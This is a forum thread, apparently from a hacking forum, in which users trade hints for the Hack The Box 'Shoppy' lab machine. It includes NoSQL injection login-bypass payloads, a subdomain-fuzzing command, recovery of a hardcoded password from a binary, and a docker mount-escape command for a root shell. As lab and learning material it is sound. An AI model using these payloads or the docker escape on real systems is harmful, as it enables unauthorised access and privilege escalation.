Posts: 19 | Threads: 0 | Joined: N/A
September 20, 2022 at 9:19 AM

(September 18, 2022, 05:47 AM) br4v0ch4rl33 Wrote:
Not only will admin'||'1==1 bypass auth, but also if entered into the search field, then it will return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
sudo -u deploy /home/deploy/password-manager

(September 18, 2022, 07:47 AM) WhiteWolf9007 Wrote:
Where did u get the master password for this? And also how u knew this command, like sudo -l has this access but the recon after that?

(September 18, 2022, 07:57 AM) nhocit Wrote:
This way: cat /home/deploy/password-manager
U will see:
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
cat /home/deploy/creds.txt
Access denied! This incident will be reported !
Pay attention to this: "Access denied" is logging in deny. Before that, it tried to read creds.txt. So we see "Access granted" is logging in success. So 'Sample' is the master password!

(September 18, 2022, 09:26 AM) pandu Wrote:
Not able to get access by Sample password.

(September 18, 2022, 09:40 AM) nhocit Wrote:
sudo -u deploy /home/deploy/password-manager
Enter password for jaeger. Then master password is required, enter Sample (S is a capital letter).
If not, then terminate the machine in Hackthebox and create a new instance!

How did u know that Sample is the master password? Can u elaborate?

Posts: 16 | Threads: 0 | Joined: N/A
September 20, 2022 at 10:47 AM

(September 20, 2022, 09:19 AM) sadgedude Wrote:
How did u know that Sample is the master password? Can u elaborate?

When running cat on the program you see it behind the input field. You can also try extracting the program into cutter or ghidra where it will probably be found just as easy.

Posts: 1 | Threads: 0 | Joined: N/A
September 27, 2022 at 3:44 PM

(September 17, 2022, 09:28 PM) elliotal Wrote:
how to root?

If you have successfully logged into @jaeger with ssh, enter the following command:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
and ls, cd root

Posts: 11 | Threads: 0 | Joined: N/A
September 29, 2022 at 9:59 PM

(September 17, 2022, 07:53 PM) elliotal Wrote:
If you put username' in the username field, the server couldn't process it for some reason.

(September 17, 2022, 08:00 PM) xurka Wrote:
There is injection there that brings us in as admin: admin'||''===' then we search the same username and get all users' hashes, but hashes are uncrackable.

How did you come up with the working injection payload?

Posts: 2 | Threads: 0 | Joined: N/A
October 2, 2022 at 6:57 PM

(September 17, 2022, 09:28 PM) elliotal Wrote:
how to root?

(September 27, 2022, 03:44 PM) 1amkaizen Wrote:
If you have successfully logged into @jaeger with ssh, enter the following command:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Hello. How did you find this command: docker run -v /:/mnt --rm -it alpine chroot /mnt sh ?
updated: ls /run => find running docker
docker root shell - https://gtfobins.github.io/gtfobins/docker/

Posts: 7 | Threads: 0 | Joined: N/A
October 2, 2022 at 10:37 PM

(October 2, 2022, 06:57 PM) iganshan Wrote:
Hello. How did you find this command: docker run -v /:/mnt --rm -it alpine chroot /mnt sh ?
updated: ls /run => find running docker
docker root shell - https://gtfobins.github.io/gtfobins/docker/

Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/create": dial unix /var/run/docker.sock: connect: permission denied.
edit: ACHIEVED!!

Posts: 0 | Threads: 0 | Joined: N/A
October 3, 2022 at 5:10 PM

Check this from GTFOBins: "This requires the user to be privileged enough to run docker, i.e. being in the docker group or being root."

Posts: 3 | Threads: 0 | Joined: N/A
October 6, 2022 at 1:41 PM

(September 17, 2022, 10:22 PM) annehathaway Wrote:
You can sudo -l to check what commands you can run; you'll see you can run as deploy a tool called password-manager. If you run strings on the binary you won't see the password, but if you just cat it you'll find deploy's password. Then, you are able to use docker; see gtfobins for how to get a shell as root.
I can't figure out, though, how you are able to bypass login auth on Shoppy Admin. Never seen and couldn't find that admin'||"===' payload. If someone can explain it to me please :)

It's like SQL injection, but it's NoSQL injection: https://book.hacktricks.xyz/pentesting-web/nosql-injection (NoSQL is SQL's biggest competitor, it's used a lot in web apps and stands for "not only SQL").

Posts: 18 | Threads: 0 | Joined: N/A
October 8, 2022 at 12:45 PM

Hey, what kind of hash is this admin hash_password?? Trying to figure out how to crack it with john and rockyou but I got nothing. Even if I include "remembermethisway" in rockyou.txt, john can't crack it.

Posts: 28 | Threads: 0 | Joined: N/A
October 11, 2022 at 9:40 AM

(October 8, 2022, 12:45 PM) Halira Wrote:
Hey, what kind of hash is this admin hash_password?? Trying to figure out how to crack it with john and rockyou but I got nothing. Even if I include "remembermethisway" in rockyou.txt, john can't crack it.

I wasn't able to crack the admin hash either, but you don't need it; you only need to crack the hash of user josh.

This box had a few neat tricks. There's actually an info disclosure (not sure if intended or not) on that first login page which gives you a heads up that you're looking at a nodejs app. Capture the login POST request with BURP, send it to Repeater and induce an error by setting the 'Content-Type' to 'application/json' and adding a malformed JSON string in the POST data. You get an error which leaks file paths and the username that the nodejs process runs under:

SyntaxError: Unexpected token a in JSON at position 1
    at JSON.parse (<anonymous>)
    at parse (/home/jaeger/ShoppyApp/node_modules/body-parser/lib/types/json.js:89:19)
    at /home/jaeger/ShoppyApp/node_modules/body-parser/lib/read.js:128:18
    at AsyncResource.runInAsyncScope (node:async_hooks:203:9)
    at invokeCallback (/home/jaeger/ShoppyApp/node_modules/raw-body/index.js:231:16)
    at done (/home/jaeger/ShoppyApp/node_modules/raw-body/index.js:220:7)
    at IncomingMessage.onEnd (/home/jaeger/ShoppyApp/node_modules/raw-body/index.js:280:7)
    at IncomingMessage.emit (node:events:513:28)
    at endReadableNT (node:internal/streams/readable:1359:12)
    at process.processTicksAndRejections (node:internal/process/task_queues:82:21)

As for the auth bypass, it's basically just abusing boolean logic. The actual code is:

const query = { $where: `this.username === '${username}' && this.password === '${passToTest}'` };

The passToTest variable here is our password input hashed, so we can forget about it as an injection point: whatever we '&&' (AND) it with will evaluate to false. But username is controllable. Operator precedence means that the '&&' (AND) operator is executed before the '||' (OR) operator, so we can strategically insert '||' (OR) operators into the username input such that the overall result of the expression is TRUE. There are several options. We don't even need to know a valid username; for example we can use '||true||' for the username and an arbitrary password (cannot be null as there is a check for that earlier in the code). This gives us:

this.username === ''||true||'' && this.password === '...'

Evaluates to:

this.username === '' || true || undefined

Evaluates to:

false || true || undefined

Evaluates to:

true